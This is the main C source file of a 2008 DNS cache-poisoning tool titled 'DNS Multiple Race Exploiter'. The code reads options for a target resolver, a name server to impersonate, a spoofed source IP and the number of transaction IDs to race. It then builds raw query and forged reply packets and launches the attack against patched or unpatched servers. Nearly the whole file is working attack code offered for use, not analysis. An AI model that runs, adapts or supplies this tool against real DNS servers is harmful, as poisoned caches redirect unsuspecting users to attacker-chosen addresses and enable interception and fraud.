/*
 * Project: DNS Multiple Race Exploiter
 * File Name: main.c
 *
 * Copyright (c) 2008 AR <ar@securebits.org>
 * Securebits [www.securebits.org]
 * ALL RIGHTS RESERVED.
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
 */

/* My Include */
#include "./dns_mre.h"

/* MAIN FUNCTION */
int main (int argc, char *argv[])
{
	/* Local variables */
	char        option;
	extern char	*optarg;
	extern int  optind;
	int			q_sockfd;
	int			r_sockfd;
	int			answer_flag = 0;
	int			q_packet_size;
	int			r_packet_size;
	int			i;
	u_int8_t	*q_raw_packet = NULL;
	u_int8_t	*r_raw_packet = NULL;
	u_int8_t	*r_raw_packets[50];
	struct in_addr 	ip_addr;

	cfg.dns_server_ip	= NULL;
	cfg.name_server		= NULL;
	cfg.dns_entry_name	= NULL;
	cfg.dns_entry_ip	= NULL;
	cfg.spoofed_ip		= NULL;
	cfg.port			= 0;
	cfg.type			= 0;
	cfg.verbosity		= 0;
	cfg.add_rr			= 1;
	cfg.ath_rr			= 1;
	cfg.txids			= 15;
	cfg.mode		= 1;

	while( ( option = getopt( argc, argv, "t:n:p:y:s:x:m:v" ) ) != EOF )
    {
        switch( option )
        {
			case 't': /* Target IP Address */
				cfg.dns_server_ip = (char *) malloc( strlen( optarg ) + 1 );
				strncpy( cfg.dns_server_ip, optarg, strlen ( optarg ) );
				break;
			case 'n': /* Name Server to impersonate */
				cfg.name_server = (char *) malloc( strlen( optarg ) + 1 );
				strncpy( cfg.name_server, optarg, strlen ( optarg ) );
				break;
			case 'p': /* Static Source Port */
				cfg.port = atoi( optarg );
				break;
			case 'y': /* Attack Type: patched or unpatched */
				cfg.type = atoi( optarg );
				break;
			case 'x': /* Number of TXIDs to use */
				cfg.txids = atoi( optarg );
				break;
			case 's': /* Spoofed Source IP */
				cfg.spoofed_ip = (char *) malloc( strlen( optarg ) + 1 );
				strncpy( cfg.spoofed_ip, optarg, strlen ( optarg ) );
				break;
			case 'm': /* Mode of the Attack */
				cfg.mode = atoi( optarg );
			case 'v': /* Verbosity */
				cfg.verbosity = 1;
				break;
			default:
				usage( argv[ 0 ] );
				exit(1);
		}
	}

	if( argc - optind != 2 )
	{
		printf("argc: %d  optin: %d\n", argc, optind);
		usage( argv[ 0 ] );
		exit(1);
	}
    else
    {	
        /* Copy the target hostname and IP entry */
		cfg.dns_entry_name = (char *) malloc( strlen( argv[ optind ] ) + 1 );
		strncpy( cfg.dns_entry_name, argv[ optind ], strlen( argv[ optind ] ) );

		cfg.dns_entry_ip = (char *) malloc( strlen( argv[ optind + 1 ] ) + 1 );
		strncpy( cfg.dns_entry_ip, argv[ optind + 1 ], strlen( argv[ optind + 1 ] ) );
    }

	/* If the user doesn't provide a spoofed IP, generate random IP */
	if( !cfg.spoofed_ip )
	{
		srand( (unsigned)time(NULL) );
		ip_addr.s_addr = (u_int32_t) rand();
		cfg.spoofed_ip = (char *) malloc( strlen(inet_ntoa( ip_addr )) );
		strcpy( cfg.spoofed_ip, inet_ntoa( ip_addr ) );
	}

	printf(
		"#################################################################\n"
		"#               DNS Multiple Race Exploiting Tool               #\n"
		"#################################################################\n\n");

	printf(
		"[*] Attacking server:              %s\n"
		"[*] Injecting the record:          %s => %s\n"
		"[*] Replies are from:              %s\n"
		"[*] Replies are delivered to port: %d\n"
		"[*] Number of TXIDs to use         %d\n"
		"[*] IP address used in queries:    %s\n",
		cfg.dns_server_ip, cfg.dns_entry_name, cfg.dns_entry_ip, 
		cfg.name_server, cfg.port, cfg.txids, cfg.spoofed_ip );
	if( cfg.mode )
		printf("[*] Attack mode: Recursive DNS Server\n");
	else
		printf("[*] Attack mode: Forwarding DNS Server\n");
	if( cfg.type )
		printf("[*] The attack is against a patched system\n\n");
	else
		printf("[*] The attack is against an unpatched system\n\n");

	/* Allocate memory for the packets */
	q_raw_packet = (u_int8_t *) malloc( RAW_PS );
	r_raw_packet = (u_int8_t *) malloc( RAW_PS );

	memset( q_raw_packet, 0, RAW_PS );
	memset( r_raw_packet, 0, RAW_PS );
	
	for( i = 0; i < cfg.txids; i++ )
	{
		r_raw_packets[ i ] = (u_int8_t *) malloc( RAW_PS );
		memset( r_raw_packets[ i ], 0, RAW_PS );
	}

	/* Initialize the sockets */
	initialize( &q_sockfd, &r_sockfd );

	/* Prepare raw packets */
	q_packet_size = prepare_raw_one( q_raw_packet, answer_flag );
	r_packet_size = prepare_raw_array( r_raw_packets, ++answer_flag );	

	/* Launch attack */
	launch_attack( q_sockfd, q_raw_packet, q_packet_size,
				   r_sockfd, r_raw_packets, r_packet_size );

	return 1;
}
